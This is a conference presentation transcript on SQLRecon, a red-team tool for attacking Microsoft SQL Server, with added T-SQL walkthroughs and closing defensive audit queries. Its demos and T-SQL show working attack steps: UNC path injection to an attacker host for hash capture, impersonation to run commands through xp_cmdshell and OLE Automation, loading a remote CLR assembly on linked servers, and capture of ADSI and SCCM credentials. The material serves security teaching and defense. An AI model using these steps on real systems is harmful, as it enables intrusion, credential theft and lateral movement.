Video: https://youtu.be/LsYSePobFWA
Conference: Black Hat USA Arsenal 2023
Presentation Title: Abusing Microsoft SQL Server with SQLRecon
Presenter: Sanjiv Kawa
2. #BHUSA @BlackHatEvents
Information Classification: General
Intro
Sanjiv Kawa
Senior Managing Security Consultant, Adversary Services at IBM X-Force Red
- Red Team Operator / Adversary Simulation
- Post-Exploitation Tool Developer
- github.com/xforcered/SQLRecon
@sanjivkawa
github.com/skahwah
Agenda
Microsoft SQL Server Overview 2 min
SQLRecon Overview 4 min
10 Demos! 20 min
- Enumeration
- Standard Modules
- Attacking MS SQL Server with Low Privileges
- Abusing MS SQL Impersonation
- Attacking Linked MS SQL Servers
- Attacking MS MECM / SCCM Databases
Defensive Considerations 3 min
Questions 5 min
Get Involved!
Hack with me
Download the latest release of SQLRecon (v3.3) from github.com/skahwah/SQLRecon/releases
Spin up a Windows VM
Connect to SSID SQLRecon-Lab, don’t worry, it’s safe
Connection details will be provided before the demos
MS SQL Server Overview
Relational database which allows the storage and retrieval of data
Deployed on-premises on top of Windows Server, or in the cloud (Azure SQL)
Used by businesses of all sizes, not just large enterprise networks
Tightly integrated into Active Directory / Azure Active Directory
Why Attack MS SQL Server?
Often overlooked
Often misconfigured
BUILTIN\Users can connect to MS SQL Server by default, which means any domain user can:
- Execute basic SQL commands
- Determine their privileges via user mappings and role memberships
- Perform UNC path injection (coerce the SQL Server service account into authenticating to an attacker-controlled host)
- Piggyback off the rights of the link to compromise linked SQL Servers
How did this research come about?
Like most tooling … to solve a problem encountered on an engagement
PowerShell is good, but C# is better when evading modern defensive controls
Address the MS SQL Server C# post-exploitation tooling gap
- Modernize the approach red teamers can take when facing MS SQL Server
- Operational Security
- Execution Guardrails
- SQLRecon works with a diverse set of C2 frameworks
- Fork & Run and In-Process compatible
New Features for Black Hat
SQLRecon v2.2.2
- Windows Token
- Local Database
- AzureAD
3 Authentication Providers
SQLRecon v3.3
+ Windows Domain
+ Azure Local Database
5 Authentication Providers
New Features for Black Hat
SQLRecon v2.2.2
- Enumerate and query MS SQL databases
- Execute arbitrary operating system commands
- Abuse impersonation
- Attack linked MS SQL Servers
57 Modules
SQLRecon v3.3
+ Ground-up rewrite following the Microsoft C#/.NET coding guidelines
+ Many new enumeration and execution modules
+ Support for attacking MECM / SCCM databases
+ Better OPSEC and execution guardrails
+ Brand new wiki
+ And more!
83 Modules
Command Line Usage
SQLRecon is straightforward to use. There are only three required arguments:
- An authentication type
- The hostname or IP address of a MS SQL Server
- A module
Example: Enumerating databases on a remote MS SQL Server
SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
Short-form command line arguments are supported and arguments are case-insensitive
SQLRecon.exe /a:wintoken /h:172.16.10.101 /m:databases
Authentication Providers
SQLRecon supports 5 different MS SQL Server authentication providers:
Authentication Type | Example
WinToken (Windows identity of the current process, no credentials needed) | SQLRecon.exe /a:WinToken /h:host /m:module
WinDomain (Windows / Active Directory credentials) | SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module
Local (SQL Server login) | SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module
AzureAD (Azure AD credentials against Azure SQL) | SQLRecon.exe /a:AzureAD /d:domain /u:user /p:pass /h:host /m:module
AzureLocal (SQL login against Azure SQL) | SQLRecon.exe /a:AzureLocal /u:user /p:pass /h:host /m:module
Module Overview
SQLRecon has 83 different modules which can be used against MS SQL Server in a variety of scenarios
Listed below are modules that can facilitate privilege escalation, lateral movement, or command execution:
Module | Privilege Escalation | Lateral Movement | Command Execution
xp_cmdshell | ✅ | ✅ | ✅
OLE Automation Procedures | ✅ | ✅ | ✅
CLR Integration for Custom .NET Assemblies | ✅ | ✅ | ✅
Agent Jobs | ✅ | ✅ | ✅
Cleartext ADSI Credential Retrieval | ✅
MECM / SCCM User Management | ✅
Cleartext MECM / SCCM Credential Retrieval | ✅
Get Involved!
Rules
Don’t DoS the lab. We’re all here to learn together.
Don’t attack each other. We’re all here to learn together.
You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything.
WiFi
SSID: SQLRecon-Lab
Password: SQLReconBH2023!
Lab
DC01 172.16.10.100
SQL01 172.16.10.101
SQL02 172.16.10.102
SQL03 172.16.10.104
MECM01 172.16.10.103
ecom01.database.windows.net
Test Connection String
SQLRecon.exe /a:WinDomain /d:kawalabs /u:jsmith /p:Password123 /h:172.16.10.101 /m:whoami
Demo 1
Recap
- Used the whoami module to determine the permissions of the current user
- Determined that KAWALABS\JSmith is a Domain User in the KAWALABS.LOCAL domain
Demo 2
Recap
- Used SQLRecon to query AD in the context of KAWALABS\JSmith and locate MS SQL Servers via registered SPNs
- Used SQLRecon to connect to SQL02 in the context of KAWALABS\JSmith and gather MS SQL Server information
SQLRecon.exe /e:SQLSpns /d:kawalabs.local
SQLRecon.exe /a:WinToken /h:SQL02 /m:info
Demo 3
Recap
- Used SQLRecon to connect to an Azure SQL instance in the context of KAWALABS\JSmith and list permissions
- Used SQLRecon to connect to an Azure SQL instance in the context of KAWALABS\JSmith and list databases
- Performed an ad-hoc SQL query to obtain the contents of the cc table in the Payments database
SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:Password123 /h:ecom01.database.windows.net /m:whoami
SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:Password123 /h:ecom01.database.windows.net /m:databases
SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:Password123 /h:ecom01.database.windows.net /database:Payments /m:query /c:"select * from cc"
Demo 4
Recap
- Used SQLRecon to connect to SQL02 in the context of KAWALABS\JSmith and make the SQL Server service account initiate an SMB connection to an attacker-controlled host, capturing its NetNTLMv2 response
SQLRecon.exe /a:WinToken /h:SQL02 /m:smb /rhost:\\172.16.10.19\Projects
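The T-SQL underneath both the "Why Attack MS SQL Server?" claims and the Demo 4 smb module, as an added example that is not part of the slides or of SQLRecon itself. It shows what a login that only holds BUILTIN\Users-level access can learn about itself and how the UNC path injection is triggered. The attacker IP 172.16.10.19 and the lab hosts follow the talk; the share name Projects is reused from the demo and everything else is standard SQL Server metadata.

```sql
-- Added example (not SQLRecon code): low-privilege enumeration and UNC path
-- injection in plain T-SQL. 172.16.10.19 is the attacker host from the lab.

-- 1. Who am I at the server level, and do I hold sysadmin?
--    IS_SRVROLEMEMBER returns 1 = member, 0 = not a member, NULL = unknown role/login.
SELECT SYSTEM_USER                  AS login_name,
       USER_NAME()                  AS db_user,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Effective server-level permissions of the current login (no elevated rights needed).
SELECT permission_name
FROM   fn_my_permissions(NULL, 'SERVER');

-- 3. Which databases am I mapped into? HAS_DBACCESS is 1 when the login resolves
--    to a user (or the guest user) in that database.
SELECT name, HAS_DBACCESS(name) AS has_access
FROM   sys.databases
ORDER  BY name;

-- 4. Which Windows logins and groups exist? A type_desc of WINDOWS_GROUP named
--    BUILTIN\Users (or Domain Users) is what lets every domain user in.
SELECT name, type_desc, is_disabled
FROM   sys.server_principals
WHERE  type IN ('U', 'G')          -- U = Windows login, G = Windows group
  AND  name NOT LIKE '##%';

-- 5. UNC path injection. xp_dirtree is executable by public by default, but the
--    directory listing is performed by the SQL Server service account, so the
--    SMB connection to \\172.16.10.19 carries that account's NetNTLMv2 response
--    to whatever is listening there (Responder, ntlmrelayx, ...).
EXEC master.sys.xp_dirtree '\\172.16.10.19\Projects', 1, 1;
```

Step 4 is the practical check for the "BUILTIN\Users by default" point: if that group appears with is_disabled = 0, every authenticated domain user can run steps 1 to 5 without any further privilege.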
Demo 5
Recap
- Used SQLRecon to connect to SQL01 in the context of KAWALABS\JSmith and attempted to execute commands via xp_cmdshell
- Attempted to enable xp_cmdshell on SQL01 in the context of KAWALABS\JSmith
- As expected, KAWALABS\JSmith hits an execution guardrail on SQL01: SQLRecon checks for the required privileges before attempting the change and stops when they are missing
SQLRecon.exe /a:WinToken /h:SQL01 /m:xpCmd /c:notepad.exe
SQLRecon.exe /a:WinToken /h:SQL01 /m:enableXP
Demo 6
Recap
- Used SQLRecon to connect to SQL02 in the context of KAWALABS\JSmith and enumerate logins that can be impersonated
- Enabled OLE Automation Procedures on SQL02 via impersonation of sa
- Executed an arbitrary command using OLE Automation Procedures on SQL02 by abusing impersonation
- Enabled xp_cmdshell on SQL02 via impersonation
- Executed an arbitrary command using xp_cmdshell on SQL02 by abusing impersonation
- Practiced good OPSEC by reverting OLE Automation Procedures and xp_cmdshell on SQL02 to their original state
SQLRecon.exe /a:WinToken /h:SQL02 /m:impersonate
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iEnableOle
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iOleCmd /c:"powershell.exe ls \\172.16.10.19\Projects"
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iEnableXp
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iXpCmd /c:tasklist
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iDisableOle
SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iDisableXp
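The same Demo 6 chain expressed in T-SQL, added here as an illustration and not taken from SQLRecon's source: find who the current login may impersonate, switch context to sa, enable and use xp_cmdshell and OLE Automation, then restore both options to their recorded state before dropping the impersonated context. Login and host names follow the lab; the query against sys.server_permissions is the standard way to list IMPERSONATE grants.

```sql
-- Added example (not SQLRecon code): impersonation to command execution and back.

-- 1. Which logins can the current login impersonate? IMPERSONATE is granted on
--    a server principal (class SERVER_PRINCIPAL); state 'G' = granted.
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate
FROM   sys.server_permissions AS p
JOIN   sys.server_principals  AS grantee ON p.grantee_principal_id = grantee.principal_id
JOIN   sys.server_principals  AS target  ON p.major_id             = target.principal_id
WHERE  p.class_desc      = 'SERVER_PRINCIPAL'
  AND  p.permission_name = 'IMPERSONATE'
  AND  p.state           = 'G';

-- 2. Switch execution context. Everything until REVERT runs as sa (sysadmin).
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER AS now_running_as, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 3. Record the original state of both options so they can be put back (the OPSEC step).
DECLARE @xp_was_on  INT = (SELECT CAST(value_in_use AS INT) FROM sys.configurations WHERE name = 'xp_cmdshell');
DECLARE @ole_was_on INT = (SELECT CAST(value_in_use AS INT) FROM sys.configurations WHERE name = 'Ole Automation Procedures');

-- 4. xp_cmdshell: 'show advanced options' must be on before it can be toggled.
EXEC sp_configure 'show advanced options', 1;  RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;            RECONFIGURE;
EXEC master..xp_cmdshell 'tasklist';

-- 5. OLE Automation: same outcome through a WScript.Shell COM object, which is
--    worth knowing when xp_cmdshell is monitored but sp_OACreate is not.
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
DECLARE @shell INT, @hr INT;
EXEC @hr = sp_OACreate 'WScript.Shell', @shell OUTPUT;
IF @hr = 0
    EXEC sp_OAMethod @shell, 'Run', NULL, 'cmd.exe /c dir \\172.16.10.19\Projects', 0, 0;
EXEC sp_OADestroy @shell;

-- 6. Restore the configuration exactly as found, then drop the impersonated context.
EXEC sp_configure 'Ole Automation Procedures', @ole_was_on; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', @xp_was_on;               RECONFIGURE;
REVERT;
```

Two things matter operationally: sp_configure changes are server-wide and logged in the SQL Server error log, so restoring the previous value (step 6) rather than blindly setting 0 keeps a server that legitimately had the feature on from breaking; and EXECUTE AS LOGIN only works when the IMPERSONATE grant from step 1 exists (or the caller is already sysadmin), which is why the impersonate module runs first.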
Demo 7
Lateral Movement: Abusing Linked MS SQL Servers
- CLR Integration allows custom .NET assemblies to be loaded into MS SQL Server
- The assembly is stored inside a database (sys.assemblies) and its entry point is exposed as a stored procedure
- Calling that stored procedure executes whatever is inside the custom assembly, in the context of the SQL Server service account!
Basic Template: gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce
Process Hollowing: gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410
// sql.cs -- minimal CLR stored procedure template; the method runs as the SQL Server service account
// Compile as a library with the 64-bit .NET Framework 4 compiler:
// C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\sql.cs
using System.Diagnostics;
using Microsoft.SqlServer.Server;

public partial class StoredProcedures
{
    // Exposed to T-SQL with: CREATE PROCEDURE ... AS EXTERNAL NAME [assembly].[StoredProcedures].[CustomFunctionName]
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void CustomFunctionName()
    {
        // notepad.exe is a harmless proof of execution; the process-hollowing gist replaces this body
        Process proc = new Process();
        proc.StartInfo.FileName = @"C:\Windows\System32\notepad.exe";
        proc.Start();
    }
}
Demo 7
Recap
- Used SQLRecon to connect to SQL02 in the context of KAWALABS\JSmith and enumerate linked MS SQL Servers
- Listed permissions on SQL03 after riding the MS SQL Server link from SQL02
- Enabled CLR Integration on SQL03 via SQL02
- Downloaded a custom .NET CLR assembly over HTTPS and executed it on SQL03 via SQL02 in order to move laterally
SQLRecon.exe /a:WinToken /h:SQL02 /m:links
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lWhoami
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lEnableClr
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lClr /dll:https://cdn.popped.io/favicon.png /function:ExecuteShellcode
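What the link modules do on the wire, as an added T-SQL example that is not SQLRecon's own code: run on SQL02, it enumerates links and their login mapping, checks the identity on the far side, enables CLR on SQL03 through the link, loads an assembly from its hex bytes, calls the exposed procedure and cleans up. SQL03 and the procedure name CustomFunctionName come from the slides; the assembly name sqlrecon_demo is an assumption and the hex literal is a placeholder for the compiled sql.cs shown above.

```sql
-- Added example (not SQLRecon code): traversing a linked server and executing a
-- CLR assembly on it. Issued while connected to SQL02; [SQL03] is the link name.

-- 1. Enumerate links and how callers are mapped onto them.
--    is_rpc_out_enabled must be 1 for EXEC (...) AT to work.
--    remote_name set     = every caller rides the link as that fixed remote login.
--    uses_self_credential = 1 passes the caller's own Windows identity through.
SELECT s.name, s.product, s.provider, s.data_source, s.is_rpc_out_enabled,
       l.remote_name, l.uses_self_credential
FROM   sys.servers AS s
LEFT JOIN sys.linked_logins AS l ON l.server_id = s.server_id
WHERE  s.is_linked = 1;

-- 2. Who are we on the far side? OPENQUERY works even when RPC out is off.
SELECT * FROM OPENQUERY([SQL03],
    'SELECT SYSTEM_USER AS remote_login, IS_SRVROLEMEMBER(''sysadmin'') AS is_sysadmin');

-- 3. Enable CLR on SQL03 through the link (needs RPC out and sysadmin on SQL03).
EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE;') AT [SQL03];
EXEC ('sp_configure ''clr enabled'', 1; RECONFIGURE;')           AT [SQL03];
-- SQL Server 2017+ also enforces "clr strict security". Either turn it off (below)
-- or register the assembly's SHA-512 hash with sp_add_trusted_assembly first.
EXEC ('sp_configure ''clr strict security'', 0; RECONFIGURE;')   AT [SQL03];

-- 4. Load the assembly from its bytes (nothing touches the remote filesystem) and
--    expose its entry point. Objects land in the remote login's default database,
--    assumed to be master here; master is TRUSTWORTHY by default, which UNSAFE
--    assemblies require. Any other database needs ALTER DATABASE ... SET TRUSTWORTHY ON.
--    0x4D5A... is a placeholder for the full hex dump of sql.dll.
EXEC ('CREATE ASSEMBLY [sqlrecon_demo] FROM 0x4D5A90000300 /* placeholder */ WITH PERMISSION_SET = UNSAFE;') AT [SQL03];
EXEC ('CREATE PROCEDURE [dbo].[CustomFunctionName] AS EXTERNAL NAME [sqlrecon_demo].[StoredProcedures].[CustomFunctionName];') AT [SQL03];
EXEC ('EXEC [dbo].[CustomFunctionName];') AT [SQL03];

-- 5. Clean up on the way out: drop the objects and return the options to their previous values
--    (0 is assumed here; record the real values first, as in the impersonation workflow).
EXEC ('DROP PROCEDURE [dbo].[CustomFunctionName]; DROP ASSEMBLY [sqlrecon_demo];') AT [SQL03];
EXEC ('sp_configure ''clr strict security'', 1; RECONFIGURE;') AT [SQL03];
EXEC ('sp_configure ''clr enabled'', 0; RECONFIGURE;')         AT [SQL03];
```

The privilege check in step 2 is the important one: a low-privileged caller on SQL02 inherits whatever the link's remote_name login holds on SQL03, which is the "piggyback off the rights of the link" point from the overview.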
Demo 8
Recap
- Used SQLRecon to connect to SQL02 in the context of KAWALABS\JSmith and enumerate the links configured on SQL03
- Started a local LDAP server on SQL03 via SQL02 and obtained the cleartext credential for the account used to link SQL03 to DC01 over ADSI
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lLinks
SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lAdsi /rhost:linkADSI /lport:49103
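The T-SQL side of Demo 8, added as an illustration and not SQLRecon's own code. It finds ADSI-backed links on SQL03 and then points the ADSI provider at a rogue LDAP listener on localhost so that the provider binds with the link's stored credential. The listener itself (what the lAdsi module loads as a CLR assembly) is assumed to already be running on SQL03 port 49103; linkADSI and the port come from the demo.

```sql
-- Added example (not SQLRecon code): ADSI linked-server credential capture,
-- issued on SQL02 and forwarded to SQL03 over the link.

-- 1. Find links that use the ADSI provider (ADSDSOObject) and the login they bind with.
--    The password is stored encrypted in SQL Server; it is the LDAP bind that exposes it.
EXEC ('SELECT s.name, s.provider, s.data_source, l.remote_name
       FROM   sys.servers AS s
       JOIN   sys.linked_logins AS l ON l.server_id = s.server_id
       WHERE  s.provider = ''ADSDSOObject''') AT [SQL03];

-- 2. Query the ADSI link but aim it at LDAP://localhost:49103, where the rogue
--    LDAP server (assumed to be running) accepts the bind and records the
--    remote_name login and its password in cleartext. The query text itself is irrelevant.
EXEC ('SELECT * FROM OPENQUERY([linkADSI], ''SELECT cn FROM ''''LDAP://localhost:49103'''''')') AT [SQL03];
```

The quoting is the only fiddly part: the OPENQUERY string is doubled once for the EXEC (...) AT batch and the LDAP URL inside it is doubled again. If step 1 returns a remote_name, the account behind it is usually a domain account with directory read rights, which is exactly the credential recovered in the demo.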
Demo 9
Recap
- Used SQLRecon to connect to the database of MECM01 and list databases
- Enumerated users who are authorized to authenticate against SCCM
- Listed tasks configured in SCCM
SQLRecon.exe /a:WinToken /h:MECM01 /m:databases
SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sUsers
SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sTaskList
Demo 10
Recap
- Used SQLRecon to connect to the database of MECM01 and list vaulted credentials
- Decrypted SCCM vaulted credentials (shout out to Adam Chester @_xpn_)
SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sCredentials
SQLRecon.exe /a:WinToken /h:MECM01 /database:CM_KAW /m:sDecryptCredentials
Defensive Considerations
Check out the Wiki for comprehensive Prevention, Detection and Mitigation guidance!
github.com/xforcered/SQLRecon/wiki
Defensive Considerations
Top 3 Network Security Controls
- Account for network routes to MS SQL Server
- Limit routes to only authorized set of systems/subnets
- Ensure you are receiving telemetry via network logging and monitoring tools
github.com/xforcered/SQLRecon/wiki
Defensive Considerations
Top 3 Endpoint Security Controls
- Regularly tune your EDR controls
- Evaluate whether your host-based security controls (EDR / AV) support scanning of .NET assemblies in memory
- Application allow-listing
github.com/xforcered/SQLRecon/wiki
Defensive Considerations
Top 3 MS SQL Server Security Controls
- Follow the Microsoft SQL Server security best practices
- Consider removing or restricting the BUILTIN\Users login and other low-privilege groups from authenticating against MS SQL Server instances
- Review impersonation grants and MS SQL Server links
github.com/xforcered/SQLRecon/wiki
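A quick audit query set that covers the three SQL Server controls above and the features the demos abused, added here as an example and not taken from the wiki. Run it as sysadmin on each instance; every row returned is something to review. The group names in step 1 are the usual offenders but are not an exhaustive list.

```sql
-- Added example (not from the SQLRecon wiki): audit an instance for the
-- conditions SQLRecon relies on. Every row returned deserves a second look.

-- 1. Broad Windows groups holding a server login (the BUILTIN\Users problem).
SELECT name, type_desc, is_disabled, create_date
FROM   sys.server_principals
WHERE  type = 'G'
  AND (name IN ('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')
       OR name LIKE '%\Domain Users');

-- 2. Server options that enable OS-level execution; expect 0 unless documented.
SELECT name, CAST(value_in_use AS INT) AS value_in_use
FROM   sys.configurations
WHERE  name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled', 'Ad Hoc Distributed Queries')
  AND  CAST(value_in_use AS INT) = 1;

-- 3. IMPERSONATE grants, flagging targets that are sysadmin (the Demo 6 path).
SELECT grantee.name AS grantee, target.name AS can_impersonate,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM   sys.server_permissions AS p
JOIN   sys.server_principals  AS grantee ON p.grantee_principal_id = grantee.principal_id
JOIN   sys.server_principals  AS target  ON p.major_id = target.principal_id
WHERE  p.class_desc = 'SERVER_PRINCIPAL' AND p.permission_name = 'IMPERSONATE' AND p.state = 'G';

-- 4. Links a caller can use to run code elsewhere: RPC out enabled, a fixed remote
--    login that every local login inherits, or an ADSI link with a stored credential.
SELECT s.name, s.provider, s.data_source, s.is_rpc_out_enabled,
       l.remote_name, l.uses_self_credential
FROM   sys.servers AS s
LEFT JOIN sys.linked_logins AS l ON l.server_id = s.server_id
WHERE  s.is_linked = 1
  AND (s.is_rpc_out_enabled = 1 OR l.remote_name IS NOT NULL OR s.provider = 'ADSDSOObject');

-- 5. User-defined assemblies that are not SAFE in any database (the Demo 7 artefact).
--    sp_MSforeachdb is undocumented but present on every on-premises version.
EXEC sp_MSforeachdb N'USE [?];
SELECT DB_NAME() AS db, name, permission_set_desc, create_date
FROM   sys.assemblies
WHERE  is_user_defined = 1 AND permission_set_desc <> ''SAFE_ACCESS'';';
```

Steps 2 and 5 are also good candidates for a scheduled job or a monitoring query: a change in either between two runs is a strong signal that someone followed the Demo 6 or Demo 7 playbook, even if they remembered to revert at the end.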